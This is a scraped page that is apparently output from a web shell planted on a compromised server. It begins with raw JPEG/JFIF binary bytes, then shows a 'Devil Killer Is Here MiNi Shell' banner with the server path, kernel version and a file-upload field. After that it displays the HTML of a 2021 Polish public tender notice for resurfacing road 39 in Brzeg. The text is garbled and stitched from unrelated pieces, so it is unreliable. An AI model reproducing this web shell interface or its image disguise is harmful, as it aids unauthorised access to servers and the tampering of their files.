JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210811/0014559501-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00145595 z dnia 2021-08-11</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont nawierzchni drogi krajowej nr 39 w m. Brzeg na odcinku od km 46+687 do km 49+300 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GENERALNA DYREKCJA DRÓG KRAJOWYCH I AUTOSTRAD ODDZIAŁ W OPOLU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział w Opolu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 017511575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Niedziałkowskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-085</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 77 4016310</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi_opole@gddkia.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gddkia.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami krajowymi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont nawierzchni drogi krajowej nr 39 w m. Brzeg na odcinku od km 46+687 do km 49+300 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0e33cdfa-f8e4-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00145595</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011850/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Remont drogi krajowej nr 39 od km 46+690 do km 49+300</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> gddkia.eb2b.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">gddkia.eb2b.com.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Instrukcja<br/>korzystania z Platformy: w przypadku posiadania konta na Platformie - zgłoszenie do postępowania<br/>wymaga zalogowania Wykonawcy do Platformy; w przypadku, gdy Wykonawca nie posiada konta na<br/>Platformie – należy w zakładce „Postępowania”, „Lista postępowań otwartych” wybrać niniejsze<br/>postępowanie oraz korzystając z polecenia „zgłoś się do udziału w postępowaniu” przejść do<br/>Formularza rejestracyjnego. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu<br/>elektronicznego: dla dokumentów w formacie „pdf” zaleca się podpis w formatem PAdES, dokumenty w<br/>formacie innym niż „pdf” zaleca się podpisywać formatem XAdES. Zalecenia Zamawiającego odnośnie<br/>podpisu osobistego: dla dokumentów w formacie „pdf” lub „xml” zaleca się podpis<br/>wewnętrzny(otoczony), dokumenty w formacie innym niż „pdf” zaleca się podpisywać podpisem<br/>zewnętrznym lub otaczającym. Zalecenia Zamawiającego odnośnie podpisu zaufanego: wielkość<br/>dokumentów nie może przekraczać 10 MB, dostępny format podpisu „xml”. Niezbędne wymagania<br/>sprzętowo-aplikacyjne umożliwiające pracę na Platformie: stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 2 Mb/s; komputer klasy PC lub MAC, o następującej<br/>konfiguracji: pamięć min 4GB RAM, Procesor Intel IV 4GHZ, jeden z systemów operacyjnych- MS<br/>Windows 7, Mac OS x 10.4, Linux lub ich nowsze wersje; zainstalowana dowolna przeglądarka<br/>internetowa obsługująca TLS 1.2, w najnowszej wersji, w przypadku Internet Explorer minimalnie<br/>wersja10.0; -włączona obsługa JavaScript; zainstalowany program Acrobat Reader lub inny<br/>obsługujący pliki w formacie „pdf”. Zamawiający dopuszcza przesyłanie danych w formatach<br/>dopuszczonych odpowiednimi przepisami prawa tj. m.in.: .doc, .docx, .txt, .xls, .xlsx, .ppt, .csv, .pdf,<br/>.jpg, .git, .png, .tif, .dwg, .ath, .kst,.zip, .rar, przy czym Zamawiający zaleca wykorzystywanie plików w<br/>formacie .pdf. Maksymalny rozmiar pojedynczego pliku to 100 MB, przy czym nie określa się limitu<br/>liczby plików. Informacja na temat kodowania i czasu odbioru danych: pliki Oferty załączone przez Wykonawcę na Platformie i zapisane, widoczne są w Platformie jako zaszyfrowane. Możliwość<br/>otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>otwarcia ofert; oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu<br/>elektronicznego datę oraz dokładny czas (hh:mm:ss), znajdującą się po lewej stronie dokumentu w<br/>kolumnie „Data przesłania”. Dokumentacja przedmiotowego postępowania dostępna jest na Platformie<br/>w zakładce „Załączniki”. Pobranie dokumentu następuje po kliknięciu na wybrany załącznik i wciśnięciu<br/>polecenia „Pobierz”. W celu pobrania wszystkich załączników jednocześnie należy wybrać polecenie<br/>„pobierz paczkę”, a następnie „pobierz wszystkie załączniki organizatora”. Ofertę, dokumenty i<br/>oświadczenia należy wczytać jako załączniki na Platformie, według Instrukcji korzystania z Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że Administratorem danych<br/>osobowych Wykonawcy jest Generalny Dyrektor Dróg Krajowych i Autostrad, ul. Wronia 53, 00-874<br/>Warszawa, tel. (022) 375 88 88, e-mail:kancelaria@gddkia.gov.pl.<br/>2. W sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z<br/>Inspektorem Ochrony Danych, za pośrednictwem adresu e-mail: iod@gddkia.gov.pl.<br/>3. Dane osobowe będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia<br/>publicznego oraz w celu archiwizacji.<br/>4. Podstawę prawną przetwarzania danych osobowych stanowi ustawa Prawo zamówień publicznych,<br/>wydane na jej podstawie akty wykonawcze, a także ustawa o narodowym zasobie archiwalnym i<br/>archiwach.<br/>5. Dane osobowe będą ujawniane wykonawcom oraz wszystkim zainteresowanym z uwzględnieniem<br/>przepisów w zakresie zamówień publicznych, a także podmiotom przetwarzającym dane na podstawie<br/>zawartych umów.<br/>6. Dane osobowe Wykonawcy będą przechowywane przez okres obowiązywania umowy a następnie 5<br/>lat, albo 15 lat w przypadku zamówień współfinansowanych<br/>ze środków UE, począwszy od 1 stycznia roku kalendarzowego następującego po zakończeniu okresu<br/>obowiązywania umowy. Okresy te dotyczą również Wykonawców, którzy złożyli oferty i nie zostały one<br/>uznane, jako najkorzystniejsze (nie zawarto z tymi Wykonawcami umowy).<br/>7. Osobie, której dane dotyczą przysługuje prawo:dostępu do danych. W przypadku, gdy wykonanie<br/>obowiązku związanego z prawem dostępu do danych wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może<br/>żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego; sprostowania danych, ich usunięcia oraz ograniczenia przetwarzania na<br/>warunkach określonych w przepisach Rozporządzenia Parlamentu i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE. Żądanie<br/>sprostowania danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z przepisami.<br/>Żądanie sprostowania danych nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z przepisami. Wystąpienie z żądaniem ograniczenia przetwarzania, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia<br/>publicznego; wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.<br/>8. Podanie danych jest dobrowolne, jednakże ich niepodanie może uniemożliwić Zamawiającemu<br/>dokonanie oceny spełniania warunków udziału w postępowaniu oraz zdolności wykonawcy do<br/>należytego wykonania zamówienia, co skutkować może wykluczeniem wykonawcy z postępowania lub<br/>odrzuceniem jego oferty</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O.Op.D-3.2412.20.2021 (39)</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 2342838,74 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont nawierzchni drogi krajowej nr 39 w m. Brzeg na odcinku<br/>od km 46+687 do km 49+300 ( z wyłączeniem odcinków :<br/>od km 47+965 do km 48+220 i od km 48+420 do km 48+467 (rondo „Solidarności") na terenie<br/>Rejonu w Opolu Oddziału w Opolu GDDKiA, polegający między innymi na zorganizowaniu i<br/>zabezpieczenie robót, w tym oznakowaniu oraz wykonaniu:<br/>Etap I:<br/>Na odcinku od km 46+687 (całe rondo) do km 47+965 należy wykonać:<br/>- frezowanie istniejącej nawierzchni ścieralnej na średnią grubość 5 cm ,<br/>- oczyszczenie nawierzchni i jej skropienie emulsją asfaltową modyfikowaną w ilości zgodnej z<br/>SST,<br/>- remont (rozbiórka i powtórne ułożenie) nawierzchni z kostki kamiennej gr. 15–20 cm, na<br/>podbudowie betonowej gr. 20 cm z betonu klasy C20/35 na opasce ronda i w miejscach<br/>wymagających regulacji (korekty),<br/>- wykonanie warstwy ścieralnej z mieszanki mastyksowo-grysowej SMA 11S o gr.<br/>5 cm,<br/>- regulacja wpustów ściekowych, studni rewizyjnych, zaworów wodociągowych i<br/>gazowych,<br/>- wykonanie oznakowania poziomego grubowarstwowego,<br/>- przywrócenie terenu budowy do użytkowania.<br/>Etap II:<br/>Na odcinku od km 48+220 do km 48+420 należy wykonać:<br/>- frezowanie istniejących warstw nawierzchni na średnią grubość 11 cm ,<br/>- oczyszczenie nawierzchni i jej skropienie emulsją asfaltową modyfikowaną w ilości zgodnej z<br/>SST ,<br/>- wykonanie warstwy wiążącej AC WMS 16 grub. 6 cm,<br/>- oczyszczenie nawierzchni i jej skropienie emulsją asfaltową modyfikowaną w ilości zgodnej z<br/>SST,<br/>- remont (rozbiórka i powtórne ułożenie) nawierzchni z kostki kamiennej gr. 15 –<br/>20 cm, na podbudowie betonowej gr. 20 cm z betonu klasy C20/35 w miejscach<br/>wymagających regulacji (korekty),<br/>Ogłoszenie nr 2021/BZP 00061058/01 z dnia 2021-05-21<br/>2021-05-21 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>- wykonanie warstwy ścieralnej z mieszanki mastyksowo-grysowej SMA 11S o gr.<br/>5 cm,<br/>- regulacja wpustów ściekowych, studni rewizyjnych, zaworów wodociągowych i<br/>gazowych,<br/>- wykonanie oznakowania poziomego grubowarstwowego,<br/>- przywrócenie terenu budowy do użytkowania .<br/>Etap III:<br/>Na odcinku od km 48+467 do km 48+760 należy wykonać:<br/>- frezowanie istniejących warstw nawierzchni na średnią grubość 16 cm ,<br/>- oczyszczenie nawierzchni i jej skropienie emulsją asfaltową modyfikowaną w ilości zgodnej z<br/>SST ,<br/>- wykonanie warstwy wyrównawczej betonem asfaltowym AC 16W o średniej<br/>grubości po zagęszczeniu 5 cm,<br/>- oczyszczenie nawierzchni i jej skropienie emulsją asfaltową modyfikowaną w ilości zgodnej z<br/>SST,<br/>- wykonanie warstwy wiążącej AC WMS 16 o grub. 6 cm,<br/>- oczyszczenie nawierzchni i jej skropienie emulsją asfaltową modyfikowaną w ilości zgodnej z<br/>SST,<br/>- wykonanie warstwy ścieralnej z mieszanki mastyksowo-grysowej SMA 11S o gr.<br/>5 cm,<br/>- remont (rozbiórka i powtórne ułożenie) nawierzchni z kostki kamiennej w<br/>miejscach wymagających regulacji (korekty),<br/>- regulacja wpustów ściekowych, studni rewizyjnych, zaworów wodociągowych i<br/>gazowych,<br/>- wykonanie oznakowania poziomego grubowarstwowego,<br/>- przywrócenie terenu budowy do użytkowania .<br/>Etap IV:<br/>Na odcinku od km 48+760 do km 49+300 należy wykonać:<br/>- frezowanie istniejących warstw nawierzchni na średnią grubość 11 cm ,<br/>- oczyszczenie nawierzchni i jej skropienie emulsją asfaltową modyfikowaną w ilości zgodnej z<br/>SST,<br/>- wykonanie warstwy wiążącej AC WMS 16 grub. 6 cm,<br/>- oczyszczenie nawierzchni i jej skropienie emulsją asfaltową modyfikowaną w ilości zgodnej z<br/>SST,<br/>- remont (rozbiórka i powtórne ułożenie) nawierzchni z kostki kamiennej gr. 15 –<br/>20 cm, na podbudowie betonowej gr. 20 cm z betonu klasy C20/35 w miejscach<br/>wymagających regulacji (korekty),<br/>- wykonanie warstwy ścieralnej z mieszanki mastyksowo-grysowej SMA 11S o gr.<br/>5 cm,<br/>- regulacja wpustów ściekowych, studni rewizyjnych, zaworów wodociągowych i<br/>gazowych,<br/>- wykonanie oznakowania poziomego grubowarstwowego,<br/>- przywrócenie terenu budowy do użytkowania.<br/>W ramach zamówienia, oprócz robót Wykonawca zobowiązany będzie również do:<br/>• organizacji placu budowy,<br/>• opracowania PZJ,<br/>• opracowania i zatwierdzenia projektu organizacji ruchu na czas prowadzenia robót.<br/>• wykonania i utrzymania oznakowania w trakcie prowadzenia robót oraz rozbiórki po zakończeniu robót,<br/>• sporządzenie operatu kolaudacyjnego,<br/>• zrealizowania wszelkich czynności, robót i prac koniecznych do prawidłowego, zgodnego z<br/>przepisami wykonania robót </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233223-8 - Wymiana nawierzchni drogowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający<br/>stosować będzie następujące kryteria oceny ofert :<br/>- Cena (C) - 60% = 60 pkt ,<br/>- Długość okresu gwarancji (G) - 20% = 20 pkt<br/>- Doświadczenie Kierownika robót drogowych (D) - 20 % = 20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika robót drogowych (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> dot. sytuacji ekonomicznej lub finansowej :<br/>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną co najmniej 1,5 mln<br/>PLN ,<br/>dot. zdolności technicznej lub zawodowej :<br/>Wykonawca musi posiadać wiedzę i doświadczenie polegające na wykonaniu (zakończeniu) w<br/>okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie co najmniej 1 zadania (co najmniej 1 umowy)<br/>polegającego na budowie, przebudowie, rozbudowie lub remoncie (z wyłączaniem remontów<br/>cząstkowych) drogi klasy co najmniej G o wartości min. 1,5 mln PLN. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu Wykonawca<br/>zobowiązany będzie na wezwanie złożyć : oświadczenie o aktualności informacji zawartych w<br/>oświadczeniu złożonym w ofercie , o którym mowa w art. 125 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu Wykonawca zobowiązany będzie na wezwanie złożyć :<br/>1) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy<br/>gwarancyjnej tego ubezpieczenia ;<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 